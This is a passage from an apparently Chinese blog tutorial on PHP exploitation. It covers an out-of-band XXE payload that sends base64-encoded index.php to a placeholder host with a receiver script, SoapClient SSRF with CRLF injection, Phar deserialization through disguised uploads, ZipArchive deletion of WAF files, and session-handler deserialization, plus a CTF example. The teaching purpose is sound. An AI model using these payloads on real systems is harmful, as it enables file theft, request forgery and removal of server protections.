class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\"?&gt;  \n&lt;!DOCTYPE ANY&#91;  \n&lt;!ENTITY % remote SYSTEM \"http:\/\/xxx.xxx.xxx.xxx\/send.xml\"&gt;  \n%remote;  \n%all;  \n%send;  \n]&gt;<\/code><\/pre>\n\n\n\n<p id=\"u154223de\"><br>send.xml<br><\/p>\n\n\n\n<pre id=\"a1nQ4\" class=\"wp-block-code\"><code>&lt;!ENTITY % file SYSTEM \"php:\/\/filter\/read=convert.base64-encode\/resource=index.php\"&gt;  \n&lt;!ENTITY % all \"&lt;!ENTITY &amp;#x25; send SYSTEM 'http:\/\/xxx.xxx.xxx.xxx\/send.php?file=%file;'&gt;\"&gt;<\/code><\/pre>\n\n\n\n<p id=\"u24487291\"><br>send.php<br><\/p>\n\n\n\n<pre id=\"Kl2DI\" class=\"wp-block-code\"><code>&lt;?php   \nfile_put_contents(\"result.txt\", $_GET&#91;'file']) ;  \n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"ud2db5e78\"><br>\u6076\u610f\u4ee3\u7801<br><\/p>\n\n\n\n<pre id=\"W4a3C\" class=\"wp-block-code\"><code>$x=new SimpleXMLElement(\"http:\/\/xxx.xxx.xxx.xxx\/evil.xml\",2,true);<\/code><\/pre>\n\n\n\n<p>构造函数的第二个参数 <code>2<\/code> 就是 <code>LIBXML_NOENT<\/code>。libxml2 从 2.9.0 起默认不做实体替换，是这个选项重新开启了实体替换；解析不可信的 XML 时不要传入 <code>LIBXML_NOENT<\/code> 或 <code>LIBXML_DTDLOAD<\/code>，也不要让 <code>data_is_url<\/code> 指向的地址由用户控制。<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"eAwob\">SSRF (SoapClient)<\/h4>\n\n\n\n<p id=\"u7d509b96\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u6c9d48a5\"><code>SoapClient<\/code><\/p>\n\n\n\n<p id=\"u88bcd8d8\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong> \u5229\u7528 <code>SoapClient<\/code> \u7684 <code>__call<\/code> \u65b9\u6cd5\u3002\u5f53\u8c03\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\uff0c<code>__call<\/code> \u4f1a\u6839\u636e\u6784\u9020\u51fd\u6570\u4e2d\u5b9a\u4e49\u7684 <code>location<\/code> \u53d1\u9001\u4e00\u4e2a SOAP \u8bf7\u6c42\uff08HTTP POST\uff09\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"C4yHW\">\u57fa\u7840 SSRF<\/h5>\n\n\n\n<pre id=\"hLuuv\" class=\"wp-block-code\"><code>&lt;?php\n$a = new SoapClient(null,array('uri'=&gt;'bbb', 'location'=&gt;'http:\/\/127.0.0.1:6888\/'));\n$b = serialize($a);\necho $b;\n$c = unserialize($b);\n$c-&gt;not_exists_function();<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"GhdP1\">CRLF 
\u6ce8\u5165<\/h5>\n\n\n\n<pre id=\"SKwNR\" class=\"wp-block-code\"><code>&lt;?php\n$target = 'http:\/\/127.0.0.1:6888';\n$post_string = 'token=ly0n';\n$headers = array(\n    'X-Forwarded-For: 127.0.0.1',\n    );\n$b = new SoapClient(null,array('location' =&gt; $target,'user_agent'=&gt;'ly0n^^Content-Type: application\/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'      =&gt; \"aaab\"));\n\n$aaa = serialize($b);\n$aaa = str_replace('^^',\"\\r\\n\",$aaa);\n$aaa = str_replace('&amp;','&amp;',$aaa);\necho $aaa;\n\n$c = unserialize($aaa);\n$c-&gt;not_exists_function();\n?&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"ENwbM\">\u53cd\u5e8f\u5217\u5316\u94fe\u8df3\u677f (Phar \u5bb6\u65cf)<\/h4>\n\n\n\n<p id=\"u84ba510a\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u91c53df5\"><code>Phar<\/code><\/p>\n\n\n\n<p id=\"u562fa71e\"><code>PharData<\/code><\/p>\n\n\n\n<p id=\"uf1fe51b3\"><code>PharFileInfo<\/code><\/p>\n\n\n\n<p id=\"u7e3351d5\"><code>PharException<\/code><\/p>\n\n\n\n<p id=\"u199ca8d7\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong> \u8fd9\u4e9b\u7c7b\u5728\u4f60\u7684\u5217\u8868\u4e2d\u4e3b\u8981\u662f\u6709 <code>__destruct<\/code> \u548c <code>__wakeup<\/code>\u3002 \u867d\u7136\u5b83\u4eec\u672c\u8eab\u4e0d\u76f4\u63a5\u63d0\u4f9b\u201c\u8bfb\u6587\u4ef6\u201d\u6216\u201c\u6267\u884c\u547d\u4ee4\u201d\u7684\u529f\u80fd\uff0c\u4f46 <code>Phar<\/code> \u5f52\u6863\u6587\u4ef6\u5728\u88ab\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\uff08\u5982 <code>file_exists<\/code>, <code>is_dir<\/code>, <code>file_get_contents<\/code> \u7b49\uff09\u901a\u8fc7 <code>phar:\/\/<\/code> \u4f2a\u534f\u8bae\u89e3\u6790\u65f6\uff0c\u4f1a<strong>\u81ea\u52a8\u53cd\u5e8f\u5217\u5316<\/strong>\u5f52\u6863\u5185\u90e8\u7684 Metadata\u3002<\/p>\n\n\n\n<p 
id=\"u5aa0fb23\">\u8fd9\u610f\u5473\u7740\uff1a\u5982\u679c\u4f60\u63a7\u5236\u4e86\u6587\u4ef6\u540d\u53c2\u6570\uff0c\u4f46\u627e\u4e0d\u5230 <code>unserialize()<\/code> \u51fd\u6570\uff0c\u4f60\u53ef\u4ee5\u4e0a\u4f20\u4e00\u4e2a\u4f2a\u9020\u7684 <code>.phar<\/code> \u6587\u4ef6\uff08\u53ef\u4ee5\u6539\u540d\u4e3a <code>.jpg<\/code>\uff09\uff0c\u7136\u540e\u5229\u7528 <code>phar:\/\/.\/upload\/Phantom.jpg<\/code> \u53bb\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"VoR6H\">ZipArchive \u7c7b\u5229\u7528 (\u6587\u4ef6\u5220\u9664)<\/h4>\n\n\n\n<p id=\"ufc23ec01\"><code>ZipArchive::open<\/code> \u65b9\u6cd5\u7684\u7b2c\u4e8c\u4e2a\u53c2\u6570\u82e5\u8bbe\u7f6e\u4e3a <code>ZipArchive::OVERWRITE<\/code> (\u5e38\u91cf\u503c\u4e3a8)\uff0c\u4f1a\u8986\u76d6\uff08\u6e05\u7a7a\/\u5220\u9664\uff09\u6307\u5b9a\u6587\u4ef6\u3002\u5e38\u7528\u4e8e\u5220\u9664WAF\u6587\u4ef6 (<code>.htaccess<\/code> \u6216 <code>waf.php<\/code>)<\/p>\n\n\n\n<pre id=\"vght8\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = new ZipArchive();\n$Phantom-&gt;open('1.txt', 8);\necho serialize($Phantom);<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-1024x425.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"425\" data-attachment-id=\"117\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=117\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87.png\" data-orig-size=\"1899,789\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-300x125.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-1024x425.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-1024x425.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-117\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"C9utT\">session\u53cd\u5e8f\u5217\u5316<\/h3>\n\n\n\n<p id=\"u0268eb28\">session\u53cd\u5e8f\u5217\u5316\uff0c\u9664\u4e86\u5165\u53e3\u4e0epayload\u683c\u5f0f\u6709\u533a\u522b\u4ee5\u5916\uff0c\u5176\u4ed6\u7684\u90fd\u4e0e\u666e\u901a\u53cd\u5e8f\u5217\u5316\u5dee\u4e0d\u591a<\/p>\n\n\n\n<p id=\"u150d6b4a\">PHP Session \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u672c\u8d28\u5dee\u5f02\u5728\u4e8e\uff1a<strong>\u5199\u5165 Session \u6570\u636e\u65f6\u4f7f\u7528\u7684\u5e8f\u5217\u5316\u5f15\u64ce<\/strong>\u4e0e<strong>\u8bfb\u53d6 Session \u6570\u636e\u65f6\u4f7f\u7528\u7684\u53cd\u5e8f\u5217\u5316\u5f15\u64ce<\/strong>\u4e0d\u4e00\u81f4\u3002<\/p>\n\n\n\n<p id=\"u8d07984a\">\u5f53\u653b\u51fb\u8005\u80fd\u591f\u63a7\u5236 Session \u4e2d\u7684\u4e00\u90e8\u5206\u5185\u5bb9\uff0c\u5e76\u6784\u9020\u7279\u6b8a\u7684\u5b57\u7b26\uff08\u4e3b\u8981\u662f\u7ad6\u7ebf 
<code>|<\/code>\uff09\uff0c\u5c31\u53ef\u4ee5\u5229\u7528\u5f15\u64ce\u89e3\u6790\u683c\u5f0f\u7684\u5dee\u5f02\uff0c\u6b3a\u9a97PHP\u5c06\u6211\u4eec\u6784\u9020\u7684\u5b57\u7b26\u4e32\u8bc6\u522b\u4e3a\u5bf9\u8c61\u5e76\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"FI2Nl\">PHP \u7684\u4e09\u79cd Session \u5e8f\u5217\u5316\u5f15\u64ce<\/h4>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>\u5904\u7406\u5668\u540d\u79f0<\/strong><\/td><td><strong>\u5b58\u50a8\u683c\u5f0f\u793a\u4f8b (\u952e\u540d\u4e3a user, \u952e\u503c\u4e3a Phantom)<\/strong><\/td><td><strong>\u7279\u6027\u63cf\u8ff0<\/strong><\/td><\/tr><tr><td><strong>php<\/strong><\/td><td><code>user|s:7:\"Phantom\";<\/code><\/td><td>\u952e\u540d + \u7ad6\u7ebf <code>|<\/code> + \u5e8f\u5217\u5316\u503c\u3002<\/td><\/tr><tr><td><strong>php_serialize<\/strong><\/td><td><code>a:1:{s:4:\"user\";s:7:\"Phantom\";}<\/code><\/td><td>PHP 5.5.4+ \u5f15\u5165\u3002\u6807\u51c6\u7684 <code>serialize()<\/code> \u683c\u5f0f\uff0c<strong>\u4e0d<\/strong>\u4f7f\u7528\u7ad6\u7ebf <code>|<\/code> \u4f5c\u4e3a\u5206\u9694\u7b26\u3002<\/td><\/tr><tr><td><strong>php_binary<\/strong><\/td><td><code>\\x04user...<\/code><\/td><td>\u952e\u540d\u7684\u957f\u5ea6\u5bf9\u5e94\u7684 ASCII \u5b57\u7b26 + \u952e\u540d + \u5e8f\u5217\u5316\u503c\u3002\uff08\u5229\u7528\u8f83\u5c11\uff09<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p id=\"u529b37d0\">\u5982\u679c\u662f <code>php_serialize<\/code> \u5199\u5165\uff0c\u4f46\u7528 <code>php<\/code> \u5f15\u64ce\u8bfb\u53d6\uff0c<code>php<\/code> \u5f15\u64ce\u4f1a\u628a\u5185\u5bb9\u4e2d\u7684 <code>|<\/code> \u5f53\u4f5c\u952e\u503c\u5206\u9694\u7b26\uff0c\u5e76\u5bf9 <code>|<\/code> \u4e4b\u540e\u7684\u90e8\u5206\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u3002\u9632\u5fa1\u4e0a\uff0c\u5e94\u4fdd\u8bc1\u5199\u5165\u4e0e\u8bfb\u53d6\u4f7f\u7528\u540c\u4e00\u4e2a <code>session.serialize_handler<\/code>\u3002<\/p>\n\n\n\n<p id=\"u53aab9cc\">\u7b80\u5355\u603b\u7ed3\u6765\u8bf4<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>\u653b\u51fb\u573a\u666f<\/strong><\/td><td><strong>\u6838\u5fc3\u524d\u7f6e\u6761\u4ef6<\/strong><\/td><td><strong>Payload \u539f\u59cb\u683c\u5f0f (Raw 
String)<\/strong><\/td><td><strong>\u6ce8\u5165\u4f4d\u7f6e<\/strong><\/td><\/tr><tr><td><strong>\u5f15\u64ce\u914d\u7f6e\u4e0d\u4e00\u81f4<\/strong><br><br>(Handler Mismatch)<\/td><td><strong>\u5b58\u50a8<\/strong>: <code>php_serialize<\/code><br><br><strong>\u8bfb\u53d6<\/strong>: <code>php<\/code><br><br><strong>\u53d8\u91cf<\/strong>: \u53ef\u63a7<\/td><td><code>|O:7:\"User\":1:{...}<\/code><\/td><td><code>$_GET<\/code> \/ <code>$_POST<\/code> \u53d8\u91cf<br><br>(\u8d4b\u503c\u7ed9 <code>$_SESSION<\/code>)<\/td><\/tr><tr><td><strong>Upload Progress<\/strong><br><br>(\u7ade\u4e89\u6761\u4ef6)<\/td><td><strong>\u914d\u7f6e<\/strong>: <code>enabled=On<\/code><br><br><strong>\u8bfb\u53d6<\/strong>: <code>php<\/code><br><br><strong>\u53d8\u91cf<\/strong>: \u65e0\u9700\u53ef\u63a7<\/td><td><code>|O:7:\"User\":1:{...}<\/code><\/td><td>POST \u8bf7\u6c42\u4f53\u4e2d\u7684<br><br><code>PHP_SESSION_UPLOAD_PROGRESS<\/code> \u503c<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"d9r4D\"><strong>\u4f8b\u9898<\/strong><\/h4>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"723\" height=\"412\" data-attachment-id=\"118\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=118\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png\" data-orig-size=\"723,412\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88-300x171.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-118\"  sizes=\"auto, (max-width: 723px) 100vw, 723px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"596\" height=\"215\" data-attachment-id=\"119\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=119\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png\" data-orig-size=\"596,215\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89-300x108.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-119\"  sizes=\"auto, (max-width: 596px) 100vw, 596px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ub648f6b8\">\u901a\u8fc7index\u5f97\u77e5\uff0c\u60f3\u8981\u8f93\u51faflag\u9700\u8981\u6ee1\u8db3name\u548cher\u7684\u503c\u76f8\u7b49\u7684\u6761\u4ef6<\/p>\n\n\n\n<p id=\"u2b3ef8aa\">\u53ef\u4ee5\u7528\u524d\u9762\u63d0\u5230\u7684php\u5f15\u7528\u6765\u5b9e\u73b0\u8fd9\u4e2a\u6761\u4ef6<img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/44105438\/1767358819218-3271455b-f79d-4d62-a054-a7560ba8700c.png\" width=\"1024\"><\/p>\n\n\n\n<p id=\"u1d13d9aa\">\u6211\u4eec\u628a\u5f97\u5230\u7684payload\u4f7f\u7528|\u6765\u5206\u9694<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-1024x592.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"592\" data-attachment-id=\"120\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=120\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90.png\" data-orig-size=\"1280,740\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-300x173.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-1024x592.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-1024x592.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-120\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"664\" height=\"398\" data-attachment-id=\"121\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=121\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png\" data-orig-size=\"664,398\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91-300x180.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-121\"  sizes=\"auto, (max-width: 664px) 100vw, 664px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"hFjNY\">phar\u53cd\u5e8f\u5217\u5316<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"for6q\">\u7b80\u4ecb<\/h4>\n\n\n\n<p 
id=\"u28a74b73\">Phar\u53cd\u5e8f\u5217\u5316\u4e0d\u4f9d\u8d56unserialize()\u51fd\u6570\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u3002\u800c\u662f\u6784\u9020phar\u6587\u4ef6\uff0c\u4ee5\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u7528\u6237\u81ea\u5b9a\u4e49\u7684meta-data\u8fd9\u4e00\u7279\u6027\uff0c<code>phar_parse_metadata<\/code>\u5728\u89e3\u6790meta\u6570\u636e\u65f6\uff0c\u4f1a\u8c03\u7528<code>php_var_unserialize<\/code>\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u3002\u5177\u4f53\u89e3\u6790\u4ee3\u7801\u3002\u8be5\u65b9\u6cd5\u9700\u8981\u5728\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\uff08file_exists()\u3001is_dir()\u7b49\uff09\u53c2\u6570\u53ef\u63a7\u7684\u60c5\u51b5\u4e0b\uff0c\u914d\u5408phar:\/\/\u4f2a\u534f\u8bae\u76f4\u63a5\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u3002<strong>\u5373\u672c\u5730\u6784\u9020phar\u6587\u4ef6\u628a\u6076\u610f\u4ee3\u7801\u672c\u5730\u5e8f\u5217\u5316\u597d\uff0c\u518d\u901a\u8fc7\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u70b9\u4e0a\u4f20phar\u6587\u4ef6\u81f3\u76ee\u6807\u7f51\u7ad9\uff0c\u6700\u540e\u7528phar\u534f\u8bae\u914d\u5408\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\u53cd\u5e8f\u5217\u5316phar\u6587\u4ef6\uff0c\u8fbe\u5230\u9884\u671f\u76ee\u7684\u3002<\/strong><\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BdSLj\"><strong>phar\u6587\u4ef6<\/strong><\/h4>\n\n\n\n<p id=\"u7898b17e\"><strong>phar<\/strong>\u6587\u4ef6\u662f\u4e00\u79cd\u6253\u5305\u5f62\u5f0f\uff0c\u628aphp\u4ee3\u7801\u548c\u5176\u4ed6\u8d44\u6e90\uff08\u56fe\u50cf\u3001\u8868\u7b49\uff09\u6346\u7ed1\u5230\u4e00\u4e2a\u5f52\u6863\u6587\u4ef6\u4e2d\u6765\u5b9e\u73b0\u5e94\u7528\u7a0b\u5e8f\u548c\u5e93\u7684\u5f00\u53d1\uff0c\u8ddfjar\u6587\u4ef6\u5dee\u4e0d\u591a\u3002\u672c\u8d28\u4e0a\u662f\u4e00\u4e2a\u538b\u7f29\u6587\u4ef6\uff0c\u4f1a\u4ee5\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u7528\u6237\u5728\u81ea\u5b9a\u4e49\u7684meta-<strong>data<\/strong>\u5185\u7684\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-1024x469.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"469\" data-attachment-id=\"122\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=122\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92.png\" data-orig-size=\"1919,878\" data-comments-opened=\"1\" 